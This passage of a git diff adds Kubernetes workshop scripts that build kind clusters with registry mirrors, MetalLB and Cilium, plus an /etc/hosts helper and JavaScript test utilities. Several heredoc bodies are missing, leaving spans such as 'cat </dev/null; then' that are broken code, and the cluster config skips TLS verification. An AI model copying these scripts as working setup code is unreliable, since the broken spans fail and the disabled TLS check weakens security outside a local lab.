[plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +helm repo add cilium https://helm.cilium.io/ + +helm --kube-context kind-kind${number} install cilium cilium/cilium --version 1.15.5 \ + --namespace kube-system \ + --set prometheus.enabled=true \ + --set operator.prometheus.enabled=true \ + --set hubble.enabled=true \ + --set hubble.metrics.enabled="{dns:destinationContext=pod|ip;sourceContext=pod|ip,drop:destinationContext=pod|ip;sourceContext=pod|ip,tcp:destinationContext=pod|ip;sourceContext=pod|ip,flow:destinationContext=pod|ip;sourceContext=pod|ip,port-distribution:destinationContext=pod|ip;sourceContext=pod|ip}" \ + --set hubble.relay.enabled=true \ + --set hubble.ui.enabled=true \ + --set kubeProxyReplacement=partial \ + --set hostServices.enabled=false \ + --set hostServices.protocols="tcp" \ + --set externalIPs.enabled=true \ + --set nodePort.enabled=true \ + --set hostPort.enabled=true \ + --set bpf.masquerade=false \ + --set image.pullPolicy=IfNotPresent \ + --set cni.exclusive=false \ + --set ipam.mode=kubernetes +kubectl --context=kind-kind${number} -n kube-system rollout status ds cilium || true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null || true" +sed -n '/```bash/,/```/p; //p' | egrep -v '```|' | sed '/#IGNORE_ME/d' diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/register-domain.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/register-domain.sh new file mode 100755 index 0000000000..1cb84cd86a --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/register-domain.sh @@ -0,0 +1,54 @@ +#!/usr/bin/env bash + +# Check if the correct number of arguments is provided +if [ "$#" -ne 2 ]; then + echo "Usage: $0 " + exit 1 +fi + +# Variables +hostname="$1" +new_ip_or_domain="$2" +hosts_file="/etc/hosts" + +# Function to check if the input is a valid IP address +is_ip() { + if [[ $1 =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then + return 0 # 0 = true - valid IPv4 address + elif [[ $1 =~ ^[0-9a-f]+[:]+[0-9a-f]*[:]*[0-9a-f]*[:]*[0-9a-f]*[:]*[0-9a-f]*[:]*[0-9a-f]*[:]*[0-9]*$ ]]; then + return 0 # 0 = true - valid IPv6 address + else + return 1 # 1 = false + fi +} + +# Function to resolve domain to the first IPv4 address using dig +resolve_domain() { + # Using dig to query A records, and awk to parse the first IPv4 address + dig +short A "$1" | awk '/^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ {print; exit}' +} + +# Validate new_ip_or_domain or resolve domain to IP +if is_ip "$new_ip_or_domain"; then + new_ip="$new_ip_or_domain" +else + new_ip=$(resolve_domain "$new_ip_or_domain") + if [ -z "$new_ip" ]; then + echo "Failed to resolve domain to an IPv4 address." + exit 1 + fi +fi + +# Check if the entry already exists +if grep -q "$hostname\$" "$hosts_file"; then + # Update the existing entry with the new IP + tempfile=$(mktemp) + sed "s/^.*$hostname\$/$new_ip $hostname/" "$hosts_file" > "$tempfile" + sudo cp "$tempfile" "$hosts_file" + rm "$tempfile" + echo "Updated $hostname in $hosts_file with new IP: $new_ip" +else + # Add a new entry if it doesn't exist + echo "$new_ip $hostname" | sudo tee -a "$hosts_file" > /dev/null + echo "Added $hostname to $hosts_file with IP: $new_ip" +fi diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/timestamped_output.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/timestamped_output.sh new file mode 100755 index 0000000000..b1f741613e --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/timestamped_output.sh @@ -0,0 +1,6 @@ +#!/bin/bash + +# Read input line by line and prepend a timestamp +while IFS= read -r line; do + echo "$(date '+%Y-%m-%d %H:%M:%S') $line" +done diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/can-resolve.test.js.liquid b/gloo-gateway/1-18/enterprise-vm/default/tests/can-resolve.test.js.liquid new file mode 100644 index 0000000000..7d1163da97 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/can-resolve.test.js.liquid @@ -0,0 +1,17 @@ +const dns = require('dns'); +const chaiHttp = require("chai-http"); +const chai = require("chai"); +const expect = chai.expect; +chai.use(chaiHttp); +const { waitOnFailedTest } = require('./tests/utils'); + +afterEach(function(done) { waitOnFailedTest(done, this.currentTest.currentRetry())}); + +describe("Address '" + process.env.{{ to_resolve }} + "' can be resolved in DNS", () => { + it(process.env.{{ to_resolve }} + ' can be resolved', (done) => { + return dns.lookup(process.env.{{ to_resolve }}, (err, address, family) => { + expect(address).to.be.an.ip; + done(); + }); + }); +}); \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/tests/chai-exec.js b/gloo-gateway/1-18/enterprise-vm/default/tests/chai-exec.js new file mode 100644 index 0000000000..67ba62f095 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/tests/chai-exec.js @@ -0,0 +1,205 @@ +const jsYaml = require('js-yaml'); +const deepObjectDiff = require('deep-object-diff'); +const chaiExec = require("@jsdevtools/chai-exec"); +const chai = require("chai"); +const expect = chai.expect; +const should = chai.should(); +chai.use(chaiExec); +const utils = require('./utils'); +const { debugLog } = require('./utils/logging'); +chai.config.truncateThreshold = 4000; // length threshold for actual and expected values in assertion errors + +global = { + checkKubernetesObject: async ({ context, namespace, kind, k8sObj, yaml }) => { + let command = "kubectl --context " + context + " -n " + namespace + " get " + kind + " " + k8sObj + " -o json"; + debugLog(`Executing command: 